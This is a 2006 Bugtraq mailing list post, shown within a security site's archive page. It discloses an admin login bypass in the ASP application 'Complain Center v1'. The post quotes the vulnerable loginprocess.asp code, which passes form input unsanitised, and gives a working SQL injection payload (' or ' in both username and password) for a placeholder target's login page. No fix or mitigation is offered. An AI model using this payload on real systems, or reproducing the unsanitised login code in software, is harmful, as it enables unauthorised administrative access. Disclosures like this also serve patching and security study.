Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection
From: ajannhwt () hotmail com
Date: 14 Sep 2006 20:02:01 -0000
ENGLISH

# Title  :   Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection

# Author :   ajann

# Exploit;

[CODE]

loginprocess.asp:
..
...
dim varUser
dim varPass
varUser=Request.Form("TxtUser") No Secure : )
varPass=Request.Form("TxtPass") No Secure : )
..
...

//Before join login page
http://[target]/[path]/login.asp

Username : ' or '
Password : ' or ' and Login Ok

# ajann,Turkey

  By Date           By Thread  

Current thread:
  • Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection ajannhwt (Sep 15)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]